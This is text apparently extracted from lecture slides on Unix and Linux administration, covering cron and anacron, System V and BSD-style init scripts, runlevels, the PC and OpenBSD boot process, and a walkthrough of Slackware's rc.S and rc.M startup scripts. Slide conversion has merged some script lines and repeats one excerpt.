your username for you to use cron jobs.
cron.deny - If the cron.allow file does not exist
but this does then, you must not be listed here.
System crontab
 Just edit /etc/crontab as root,
nowadays it reloads automatically
Common Uses for CRON
 Cleaning the filesystem
 Distribution of config files
 Rotating log files
 Backups
 Heavy task offloading (e.g. database reindexing at
nights)
 Not suitable for end user systems (Desktop/Laptop/etc.)
that are not runing 24/7 (or up at cron defined times)
–
–
Critical tasks not started (e.g. nightly backup not
created)
Tasks piling up (when started system is affected)
Anacron - anac(h)ronistic cron
Anacron can be used to execute commands periodically,
with a frequency specified in days. Unlike cron, it does
not assume that the machine is running continuously.
/etc/anacrontab contains list of jobs. Each job entry
specifies a period in days, a delay in minutes, a
unique job identifier, and a shell command.
For each job Anacron:
checks whether this job has been executed in the last n days,
where n is the period specified for that job
if not, runs the job's shell command, after waiting for the number
of minutes specified as the delay parameter
date is recorded in a special timestamp file, so it can know when
Anacron II
Frequently replaces cron >=daily tasks in end user systems
$ cat /etc/crontab
17 * * * * root
cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
$ cat /etc/anacrontab
1 5
cron.dailyrun-parts --report /etc/cron.daily
7 10
cron.weekly
@monthly
run-parts --report /etc/cron.weekly
15 cron.monthly run-parts --report /etc/cron.monthly
# cat /var/spool/anacron/cron.daily
20131010
Anacron III
Daily task might get started multiple times per day if it
never completes
Frequently anacron use battery saving feature
# cat /usr/lib/pm-utils/power.d/anacron
#!/bin/sh
# This script makes anacron jobs start/stop when a machine gets or loses AC
# power.
case $1 in
false)
start -q anacron || :
;;
true)
stop -q anacron || :
;;
esac
Tālāk daudz slaidu no
iepriekšējiem gadiem, kas
šobrīd netiek stāstīti
 Interesantas advancētas lietas
 Neaktuālas lietas
 Novecojušas lietas
Init scripts in Gentoo
 Named (not numbered) run levels.
 Smart dependencies.

Scripts can ‘use’ or ‘depend’ on others.
 Start / Stop / Pause.
 /etc/runlevels/default/.
Webmin
 Webmin is a web-based interface for system
administration for Unix. Using any browser that
supports tables and forms (and Java for the File
Manager module), you can setup user accounts,
Apache, DNS, file sharing and so on.
 http://www.webmin.com
System V initialization system
RHEL 4
BOOTFLAGS
It is possible to pass a number of flags to init from the boot monitor (eg. LILO). Init accepts
the following flags:
-s, S, single - Single user mode boot. In this mode /etc/inittab is examined and the bootup rc
scripts are usually run before the single user mode shell is started.
1-5 - Runlevel to boot into.
-b, emergency - Boot directly into a single user shell without running any other startup
scripts.
-a, auto - The LILO boot loader adds the word "auto" to the command line if it booted the
kernel with the default command line (without user intervention). If this is found init sets the
"AUTOBOOT" environment variable to "yes".
-z xxx - The argument to -z is ignored. You can use this to expand the command line a bit,
so that it takes some more space on the stack. Init can then manipulate the command line
so that ps(1) shows the current runlevel.
/etc/inittab
# The default runlevel is defined here
id:5:initdefault:
# what to do when CTRL-ALT-DEL is pressed
ca::ctrlaltdel:/sbin/shutdown -r -t 4 now
# First script to be executed
si::sysinit:/etc/rc.d/rc.sysinit
# getty-programs for the normal runlevels
# The "id" field MUST be the same as the
# last characters of the device name
1:2345:respawn:/sbin/mingetty --noclear
tty1
2:2345:respawn:/sbin/mingetty tty2
3:2345:respawn:/sbin/mingetty tty3
4:2345:respawn:/sbin/mingetty tty4
5:2345:respawn:/sbin/mingetty tty5
6:2345:respawn:/sbin/mingetty tty6
# /etc/init.d/rc takes care of
# runlevel handling
l0:0:wait:/etc/init.d/rc 0
l1:1:wait:/etc/init.d/rc 1
l2:2:wait:/etc/init.d/rc 2
l3:3:wait:/etc/init.d/rc 3
l4:4:wait:/etc/init.d/rc 4
l5:5:wait:/etc/init.d/rc 5
l6:6:wait:/etc/init.d/rc 6
ls:S:wait:/etc/init.d/rc S
rc.sysinit
 Setting the path and the hostname, and checking whether networking is
activated.
 Mounting the /proc filesystem
 Setting the kernel parameters
 Setting the system clock
 Loading keymaps and fonts
 Starting swapping
 Initializing the USB controller along with the attached devices.
 Checking the root filesystem.
 Remounting the root filesystem as read-write.
 Loading modules as appropriate.
/etc/init.d/rc
 All initialization scripts are located
in /etc/init.d.
 Scripts for changing the runlevel are
also found there, but are called
through symbolic links from one of
the subdirectories (/etc/init.d/rc0.d
to /etc/init.d/rc6.d).
 Because every script can be
executed as both a start and a stop
script, these scripts must understand
the parameters start and stop.
Possible init Script Options
Option
Description
start
Start service.
stop
Stop service.
restart
If the service is running, stop it
then restart it. If it is not running, start it.
reload
Reload the configuration
without stopping and restarting the service.
force-reload Reload the configuration if the
service supports this. Otherwise, do the same
as if restart had been given.
status
Show the current status of
service.
/sbin/rc
unix root # more /sbin/rc
#!/bin/bash
trap ":" INT QUIT TSTP
source /sbin/functions.sh
# Only source this when this is a livecd booting ...
[ -f /sbin/livecd-functions.sh ] && source /sbin/livecd-functions.sh
umask 022
try() {
local errstr
local retval=0
if [ -c /dev/null ]; then
errstr="$((eval $*) 2>&1 >/dev/null)"
else
errstr="$((eval $*) 2>&1)"
fi
retval=$?
if [ "${retval}" -ne 0 ]
then
# Progressbar begin
if [ -c /dev/null ]; then
rc_splash "stop" &>/dev/null &
else
rc_splash "stop" &
fi
# Progressbar end
...
init scripts start other processes
/etc/rc.d/rc5.d
K35smb
K35vncserver
K35winbind
K50netdump
K50snmptrapd
K73ypbind
K74nscd
S50snmpd
S55cups
S55sshd
S56rawdevices
S56xinetd
S58ntpd
S60nfs
/etc/init.d
cups
netdump
nfs
nscd
ntpd
rawdevices
smb
Scripts for each runlevel snmpd
are symbolic links to their / snmptrapd
etc/init.d counterpart
sshd
vncserver
winbind
xinetd
ypbind
K = Kill
S = Start
The system first runs the scripts whose names start with K to kill the
associated processes  /etc/rc.d/init.d/<command> stop
The system runs the scripts whose names start with S to start the
processes  /etc/rc.d/init.d/<command> start
System V initialization system
RHEL 4
[juris@ns1 rc4.d]$ pwd
/etc/rc.d/rc4.d
[juris@ns1 rc4.d]$ ls –l
...
lrwxrwxrwx 1 root root 19 Jun 2 2005 K05saslauthd -> ../init.d/saslauthd
lrwxrwxrwx 1 root root 13 Jun 2 2005 K20nfs -> ../init.d/nfs
lrwxrwxrwx 1 root root 14 Jun 2 2005 K24irda -> ../init.d/irda
lrwxrwxrwx 1 root root 15 Jun 2 2005 K25squid -> ../init.d/squid
lrwxrwxrwx 1 root root 16 Jun 2 2005 S09pcmcia -> ../init.d/pcmcia
lrwxrwxrwx 1 root root 16 Jun 2 2005 S40smartd -> ../init.d/smartd
lrwxrwxrwx 1 root root 14 Jun 2 2005 S55sshd -> ../init.d/sshd
lrwxrwxrwx 1 root root 16 Aug 11 2005 S55sshdlp -> ../init.d/sshdlp
...
lrwxrwxrwx 1 root root 15 Jun 2 2005 S97rhnsd -> ../init.d/rhnsd
lrwxrwxrwx 1 root root 11 Jun 15 2005 S99local -> ../rc.local
[juris@ns1 rc4.d]
Benefits of init Scripts
 One of the benefits of using init directory scripts is that
they are easily tested.


The scripts may be manually invoked with the stop and start
arguments as a check to determine whether they function
correctly before creating the links to the rc directories, and
trying them under actual system boot conditions.
This procedure is recommended because it can help you
catch mistakes that might interrupt the boot process and
leave the system unusable.
System V initialization
 System service manipulation command
[juris@ns1 init.d]$ /sbin/service
Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]
[juris@ns1 init.d]$ /sbin/service sshdlp
Usage: /etc/init.d/sshdlp {start|stop|restart|reload|condrestart|status}
[juris@ns1 init.d]$
Changing Run Levels
 The following commands are typically reserved for
system maintenance activities.



UNIX shutdown Command
The System V init 0 Command
The telinit Command

NOTE: The shutdown, telinit, and init 0 commands can only be
executed with root access.
System V initialization
Init reacts to several signals
SIGHUP
Has the same effect as telinit q.
SIGUSR1
On receipt of this signals, init closes and re-opens its control fifo,
/dev/initctl. Useful for bootscripts when /dev is remounted.
SIGINT
Normally the kernel sends this signal to init when CTRL-ALT-DEL is
pressed. It activates the ctrlaltdel action.
SIGWINCH
The kernel sends this signal when the keyboardSignal key is hit. It
activates the kbrequest action.
The OS Kernel
 UNIX Run Levels


All flavors of UNIX, and UNIX- work-alikes use similar
foundations for the system run modes.
As far as UNIX and its ilk are concerned, there are basically
two run modes:
single user (sometimes called maintenance mode), and
 multi-user.

 There may be several forms of the multi-user mode (with services,
without services, and so on) on any given UNIX OS.
The OS Kernel
 Typically, BSD variants include a run control (also known as an rc) script
in the /etc directory.

This allows the administrator to edit a single /etc/rc script to make it start a
new service at boot time.
 Other BSD variants have simply increased the number of rc files in the
/etc directory.

For example, the FreeBSD start-up directory contains scripts with names
such as /etc/rc.atm, /etc/rc.firewall, and /etc/rc.network.


These individual scripts, respectively, configure the ATM network
cards, cause the system to become a firewall, and configure the network
links respectively.
These scripts are called by the master script, /etc/rc
Sample BSD Startup Scripts
/etc/rc.boot
 First rc script to run is /etc/rc.boot



The first two lines set HOME and PATH environment variables
Executes basic system commands during boot
hostname file in /etc for each network interface
enables IP networking on each interface
 Find hostname from other machine on NW using hostconfig
program and use NFS to mount filesystems
 System Administrator intervene to fix problem

Advanced Boot Concepts
 Initial ramdisk (initrd) – two-stage boot for flexibility:





First mount “initial” ramdisk as root.
Execute linuxrc to perform additional setup, configuration.
Finally mount “real” root and continue.
See Documentation/initrd.txt for details.
Also see “man initrd”.
 Net booting:


Remote root (Diskless-root-HOWTO).
Diskless boot (Diskless-HOWTO).
System initialization
 Overview of the PC Boot Process

When a PC is powered on, the BIOS (Basic
Input-Output System) runs first, followed by
a boot loader and finally the operating
system initialization routine.
System initialization
 The BIOS


When power is initially applied to the computer this triggers the
RESET pin on the processor. This causes the processor to
read from memory location 0xFFFFFFF0 and begin executing
the code located there. This address is mapped to the ReadOnly Memory (ROM) containing the BIOS. The BIOS must poll
the hardware and set up an environment capable of booting
the operating system. BIOS functionality can be broken into
three areas: Power On Self Test (POST), Setup and Boot.
The last action of the BIOS is to execute the 19h interrupt,
which loads the first sector of the first boot device. Since this is
the location of the boot loader, execution of the 19h interrupt
transfers control to the boot loader.
System initialization
 The Boot Loader




Once the BIOS loads the first sector of the boot device into RAM,
the boot loader begins execution. In the case of a hard drive, this
first sector is referred to as the Master Boot Record (MBR). The
MBR contains the partition table describing the partitions defined on
the hard drive. It also contains a program, the boot loader, which
will load the first sector of the partition marked as active into RAM
and execute it.
The size of the MBR is limited to one sector on disk or 512 bytes,
since it is located within the first sector of the drive at cylinder 0,
head 0, sector 1.
Typically boot loaders have been highly integrated with the
operating system that they support. This integration cuts down on
the operations a boot loader must perform, making a 512 byte boot
loader feasible. When more functionality is required, a multi-stage
boot loader may be used.
A multi-stage boot loader provides more function and flexibility by
working around the 512 byte size limitation. Rather than consisting
of a single program which loads the operating system directly, multistage boot loaders divide their functionality into a number of smaller
programs that each successively load one another.
System initialization
 OS Initialization




Once the boot loader has loaded the OS image into memory,
control is transferred to the OS.
A large aspect of initialization for any operating system is the
establishment of virtual memory management. On an Intelbased system this typically involves setting up the Global
Descriptor Table (GDT), creating a Local Descriptor Table
(LDT), switching the processor into protected memory mode,
setting up page directories and enabling paging.
Additional tasks include device driver initialization and the
assignment of interrupts in the Interrupt Descriptor Table (IDT).
Another major initialization task is establishing support for
various file system types and mounting a root file system.
System initialization
 OS Initialization




The initial process must explicitly do for itself all the tasks
accomplished by a call to fork(). This initial process,
numbered 0 on UNIX systems.
Process 0 must be able to self-generate its own process
context. Once this context has been established, the system
has the capability to suspend and resume execution of
Process 0 just as it would any other process. Once
established, the role of Process 0 differs by operating
system.
Process 1, commonly referred to as the init process, is the
first process forked from Process 0.
Once Process 1 has been forked from Process 0, often a
number of additional kernel space processes are created to
handle additional kernel space tasks. Once all of these are
running, the kernel space operating system initialization is
complete.
System initialization
System initialization
 OpenBSD employs a two-stage boot loading process, if one
does not count the MBR as a separate “stage.” The first stage is
handled by a boot loader program called biosboot, while the
secondary boot loader is called simply boot.
 The boot program sets up an environment suitable for
transferring control to the kernel image. It also provides an
interactive prompt for user input of additional boot parameters.
The main tasks of the boot program are:
1. Switching the CPU into protected mode
2. Probing for console devices and displaying subsequent
messages to the discovered consoles
3. Detecting memory, both that reported by the BIOS and
extended memory
4. Detecting if the BIOS supports Advanced Power
Management (APM)
System initialization
System initialization
System initialization
1. A “pagedaemon” process to handle page swapping for
the virtual memory subsystem,
2. A “reaper” process to free the resources still allocated
to dead processes,
3. A “cleaner” process to clear out dirty buffers found in
the BQ_DIRTY buffer queue,
4. An “update” process for synchronizing the file systems,
5. An “aiodoned” process for handling completed
asynchronous I/O operations,
System initialization
 With all kernel threads running, only a few finishing
touches are needed. The random number generator is
seeded and the generation of process identification
numbers is set up such that each successive process
will be given a larger pseudo-random number than its
predecessor. At this point, Process 0 finally enters its
main loop by calling uvm_scheduler(). This function
has Process 0 continually check for processes that are
in a runnable state but not resident in memory and
swaps them in. Control never returns to the main()
function from this call and one could say the operating
system is truly running.
System initialization
System initialization
System initialization
Userspace system initialization
 Historically there are two initialization systems :


System V
BSD
 These two system differ with names, script running order,
directory hierarchy which hold initialization scripts.
 Linux systems mainly use System V initialization system.
Exclude Slackware, whose initialization system very
similar to BSD.
Userspace system initialization
 Kernel start up root file system in ro mode and run init process
 As a result we have:
 ro file system
 init process
 The next system step initializing user space environment greatly
depends on init configuration file /etc/inittab
 It’s very important to understand that until this moment it doesn’t
matter what initialization system will be used.
Userspace system initialization
 INIT


Starting from this point next system behavior greatly
depend on how init program configuration created.
Because kernel mount root file system in ro mode init
process can access it’s configuration file /etc/inittab.
Userspace system initialization
1.
2.
3.
4.
5.
6.
7.
8.
When it’s time to create process, the kernel first of all try to run program
mentioned in rdinit= boot option.
If rdinit= boot option didn’t specify path to init programm, kernel try to run /init
If there’s no /init program, kernel try to run program from init= boot option
If init= option didn’t specify path, kernel try /sbin/init
If there’s problem with /sbin/init, kernel try /etc/init
It there’s problem with /etc/init, then kernel try /bin/init
If there’s problem running /bin/init, then kernel try to run /bin/sh
If there’s problem with /bin/sh, then kernel panic with error message “No init
found ….”
Userspace system initialization
 Run levels



There are 7 runlevels: 0-6
System at any time working in one of this runlevels
You, as administrator of the system can switch system from
one runlevel to another using telinit or init programs







0 runlevel – shutdown system
1 runlevel – single user mode
2 runlevel – in most cases same as runlevel 3 but without network file system,
at least in RedHat or SUSE linux
3 runlevel – multiuser mode.
4 runlevel – In Slackware used for GUI login. RedHat and SUSE linux don’t
use this runlevel.
5 runlevel – RedHat and SUSE linux use for GUI login. Slackware don’t use
this level
6 runlevel – system reboot level
Userspace system initialization
 Slackware system initialization:


Slackware system initialization use BSD style system
initialization scripts.
All scripts are in /etc/rc.d directory
Userspace system initialization
/etc/rc.d/rc.S file


1.
2.
3.
Based in /etc/inittab file rc.S file will be executed the first one
no matter which runlevel system will run.
Based on #!/bin/sh we can tell, that it’s a shell script.
First of all we define PATH environment variable
PATH=/sbin:/usr/sbin:/bin:/usr/bin
Then we mount proc filesystem to /proc diretory
/sbin/mount -v proc /proc -n -t proc
Userspace system initialization
4. Check if we can run hotplug system
if [ -w /proc/sys/kernel/hotplug ]; then
if grep -w nohotplug /proc/cmdline 1> /dev/null 2> /dev/null ; then
echo "/dev/null" > /proc/sys/kernel/hotplug
elif [ ! -x /etc/rc.d/rc.hotplug ]; then
echo "/dev/null" > /proc/sys/kernel/hotplug
fi
fi
5. Check if we can run devfs script and use devfs filesystem
if [ -x /etc/rc.d/rc.devfsd ]; then
/etc/rc.d/rc.devfsd start
fi
Userspace system initialization
6. Check if we can use virtual sysfs filesystem
if [ -d /sys ]; then
if cat /proc/filesystems | grep -w sysfs 1> /dev/null 2> /dev/null then
if ! cat /proc/mounts | grep -w sysfs 1> /dev/null 2> /dev/null then
/sbin/mount -v sysfs /sys -n -t sysfs
fi
fi
fi
7.Check if it’s possible to run udev programm.
if [ -x /etc/rc.d/rc.udev ]; then
if ! grep -w nohotplug /proc/cmdline 1> /dev/null 2> /dev/null; then
/etc/rc.d/rc.udev
fi
fi
Userspace system initialization
8. Turn on all swap filesystem
/sbin/swapon -a
9. Check what mode root filesystem have been mounted
READWRITE=no
if touch /fsrwtestfile 2>/dev/null; then
rm -f /fsrwtestfile
READWRITE=yes
else
echo "Testing root filesystem status: read-only filesystem"
fi
10. Check is it necessary to force file system check:
if [ -r /etc/forcefsck ]; then
FORCEFSCK="-f"
fi
Userspace system initialization
11. Check if it’s necessary to check root filesystem
if [ ! -r /etc/fastboot ]; then
echo "Checking root filesystem:" /sbin/fsck $FORCEFSCK -C -a / RETVAL=$?
fi
12. Check fsck program return code
if [ $RETVAL -ge 2 ]; then
if [ $RETVAL -ge 4 ]; then
echo PS1="(Repair filesystem) \#"; export PS1
sulogin
else
echo
fi
echo "Unmounting file systems."
/sbin/umount -a -r
/sbin/mount -n -o remount,ro /
echo "Rebooting system."
sleep 2
reboot -f
fi
Userspace system initialization
13. Ir 12 pint are ok, then remount root filesystem in rw mode
/sbin/mount -w -v -n -o remount /
if [ $? -gt 0 ] ; then
echo
read junk;
fi
Userspace system initialization
14. Set system time
if [ -x /sbin/hwclock ]; then
if grep "^UTC" /etc/hardwareclock 1> /dev/null 2> /dev/null ; then
echo "Setting system time from the hardware clock (UTC)."
/sbin/hwclock --utc --hctosys
else
echo "Setting system time from the hardware clock (localtime)."
/sbin/hwclock --localtime --hctosys
fi
fi
15. Try to load kernel modules
if [ -x /etc/rc.d/rc.modules -a -r /proc/modules ]; then
. /etc/rc.d/rc.modules
fi
Userspace system initialization
16. Try to load sysctl kernel configuration
if [ -x /sbin/sysctl -a -r /etc/sysctl.conf ]; then
/sbin/sysctl -e -p /etc/sysctl.conf
fi
17. If there’s no /etc/fastboot file, then other file systems will be checked.
if [ ! -r /etc/fastboot ]; then
/sbin/fsck $FORCEFSCK -C -R -A -a
fi
18. Mount all file systems from /etc/fstab file except ntfs and smbfs file systems
/sbin/mount -a -v -t nonfs,nosmbfs,noproc
Userspace system initialization
19. Repeatedly turn on swap filesystem
/sbin/swapon -a
20. Delete temporary files
( cd /var/log/setup/tmp && rm -rf * ) /bin/rm -f /var/run/utmp /var/run/*pid /etc/nologin
/var/run/lpd* \ /var/run/ppp* /etc/dhcpc/*.pid /etc/forcefsck /etc/fastboot
21. If kernel use initrd technology, then turn off RAM disk, delete initrd directory and free
memory
if [ -d /initrd ]; then
/sbin/umount /initrd 2> /dev/null
rmdir /initrd 2> /dev/null
blockdev --flushbufs /dev/ram0 2> /dev/null
fi
Userspace system initialization
22. Create utmp file
touch /var/run/utmp
chown root.utmp /var/run/utmp
chmod 664 /var/run/utmp
23. Create motd file
echo "$(/bin/uname -sr)." > /etc/motd
24. If it’s necessary we can use System V initialization scripts
if [ -x /etc/rc.d/rc.sysvinit ]; then . /etc/rc.d/rc.sysvinit
fi
Userspace system initialization
25. Create everything for random number generator
if [ -f /etc/random-seed ]; then
echo "Using /etc/random-seed to initialize /dev/urandom."
cat /etc/random-seed > /dev/urandom
fi
if [ -r /proc/sys/kernel/random/poolsize ]; then
dd if=/dev/urandom of=/etc/random-seed count=1 \
bs=$(cat /proc/sys/kernel/random/poolsize) 2> /dev/null
else
dd if=/dev/urandom of=/etc/random-seed count=1 bs=512 2> /dev/null
fi
chmod 600 /etc/random-seed
Userspace system initialization
 /etc/rc.d/rc.modules user direct modprobe program
execution to load kernel modules. All you have to do –
uncomment needed module, ex.:
/sbin/modprobe 3c503
 /etc/rc.d/rc.modules is also used for loading network card
modules, by the means of executing /etc/rc.d/rc.netdevice
script
if [ -x /etc/rc.d/rc.netdevice ]; then
. /etc/rc.d/rc.netdevice
fi
Userspace system initialization
 /etc/rc.d/rc.S script used for:
 Activating swap space
 File system check
 File system mounting
 Loading kernel modules, loading network drivers and
so on, by executing /etc/rc.d/rc.modules script
 Some other system startup behavior
Userspace system initialization
/etc/rc.d/rc.M script

1.
/etc/rc.d/rc.M script used to bring system to 2, 3 and 4 runlevel.
Going multiuser:
echo "Going multiuser..."
2. Set terminal parameters:
/bin/setterm -blank 15 -powersave powerdown -powerdown 60
3. Check /etc/HOSTNAME file and set system hostname
if [ -r /etc/HOSTNAME ]; then
/bin/hostname $(cat /etc/HOSTNAME | cut -f1 -d .)
else
echo "darkstar.example.net" > /etc/HOSTNAME /bin/hostname darkstar
fi
Userspace system initialization
4. Save all kernel messages to /var/log/dmesg file:
/bin/dmesg -s 65536 > /var/log/dmesg
5. Start up SYSLOG daemon:
if [ -x /etc/rc.d/rc.syslog -a -x /usr/sbin/syslogd -a -d /var/log ] then
. /etc/rc.d/rc.syslog start
fi
6. Starp up pcmcia controller support
if [ -x /etc/rc.d/rc.pcmcia ] ; then
. /etc/rc.d/rc.pcmcia start
if [ -r /var/run/cardmgr.pid ]; then
sleep 5
fi
fi
Userspace system initialization
7. Start up network phase 1 initialization
if [ -x /etc/rc.d/rc.inet1 ]; then
. /etc/rc.d/rc.inet1
fi
8. Hotplug support start up
if [ -x /etc/rc.d/rc.hotplug -a -r /proc/modules ]; then
if ! grep nohotplug /proc/cmdline 1> /dev/null 2> /dev/null ; then
echo "Activating hardware detection: /etc/rc.d/rc.hotplug start"
. /etc/rc.d/rc.hotplug start
fi
fi
Userspace system initialization
9. Start up network phase 2 initialization
if [ -x /etc/rc.d/rc.inet2 ]; then
. /etc/rc.d/rc.inet2
fi
10. Remove temporary files
/bin/rm -f /var/lock/* /var/spool/uucp/LCK..* \
/tmp/.X*lock /tmp/core /core 2> /dev/null
11. Change root directory access mode and set sticky bit on /tmp and /var/tmp directory
chmod 755 / 2> /dev/null
chmod 1777 /tmp /var/tmp
Userspace system initialization
12. Create dynamic loadable library cache
if [ -x /sbin/ldconfig ]; then
echo "Updating shared library links: /sbin/ldconfig"
/sbin/ldconfig
fi
13. Start simple DNS cache server
if [ -x /etc/rc.d/rc.dnsmasq ]; then /etc/rc.d/rc.dnsmasq start
fi
14. Starp up CUPS un LPRng print system
if [ -x /etc/rc.d/rc.cups ]; then
/etc/rc.d/rc.cups start
elif [ -x /etc/rc.d/rc.lprng ]; then
. /etc/rc.d/rc.lprng start
fi
Userspace system initialization
15. Start up support for “BSD accounting” subsystem
if [ -x /sbin/accton -a -r /var/log/pacct ]; then
/sbin/accton /var/log/pacct
chmod 640 /var/log/pacct
echo "Process accounting turned on."
fi
16. Start cron daemon
if [ -x /usr/sbin/crond ]; then
/usr/sbin/crond -l10 >>/var/log/cron 2>&1
fi
17. Start atd
if [ -x /usr/sbin/atd ]; then
/usr/sbin/atd -b 15 -l 1
fi
Userspace system initialization
18. Start up disk quota mechanism
if grep -q quota /etc/fstab ; then
if [ -x /sbin/quotacheck ]; then
echo "Checking filesystem quotas: /sbin/quotacheck -avugm"
/sbin/quotacheck -avugm
fi
if [ -x /sbin/quotaon ]; then
echo "Activating filesystem quotas: /sbin/quotaon -avug"
/sbin/quotaon -avug
fi
fi
19. Start up sendmail system
if [ -x /etc/rc.d/rc.sendmail ]; then
. /etc/rc.d/rc.sendmail start
fi
Userspace system initialization
20. The last one will be /etc/rc.d/rc.local script, which
is used for customize system start up and execute
applications without System V or BSD initialization
scripts.
Userspace system initialization
 If we need to execute script upon system start up we
need to set execution permissions on this script
 And vice versa, if we don’t need to execute this service,
don’t make it executable.
 Every start up script – relatively simple shell script. It may
handle command line parameters like: start – to start
service, and stop – to stop service
 If you don’t have initialization script for certain application
we handle this situation in 2 different way:
Userspace system initialization
1.
2.
Make /etc/rc.d/rc.local script execute this program
Write down your own start up script and add
information about new script to /etc/rc.d/rc.M
Userspace system initialization
 Script example for custom service using /etc/rc.d/rc.M start up mechanism
#! /bin/bash
start()
{
echo “Program started”
program_start
}
stop()
{
echo “Program stoped”
killall program
}
case $1 in
start) start ;;
stop) stop ;;
restart) stop sleep 2 start ;;
*) echo “Usage: Program start|stop|restart”
esac
Userspace system initialization
 Add this script to /etc/rc.d/rc.M script by entering
if [ -x /etc/rc.d/rc.script ]; then
. /etc/rc.d/rc.script start
fi
/sbin/rc
unix root # more /sbin/rc
#!/bin/bash
trap ":" INT QUIT TSTP
source /sbin/functions.sh
# Only source this when this is a livecd booting ...
[ -f /sbin/livecd-functions.sh ] && source /sbin/livecd-functions.sh
umask 022
try() {
local errstr
local retval=0
if [ -c /dev/null ]; then
errstr="$((eval $*) 2>&1 >/dev/null)"
else
errstr="$((eval $*) 2>&1)"
fi
retval=$?
if [ "${retval}" -ne 0 ]
then
# Progressbar begin
if [ -c /dev/null ]; then
rc_splash "stop" &>/dev/null &
else
rc_splash "stop" &
fi
# Progressbar end
...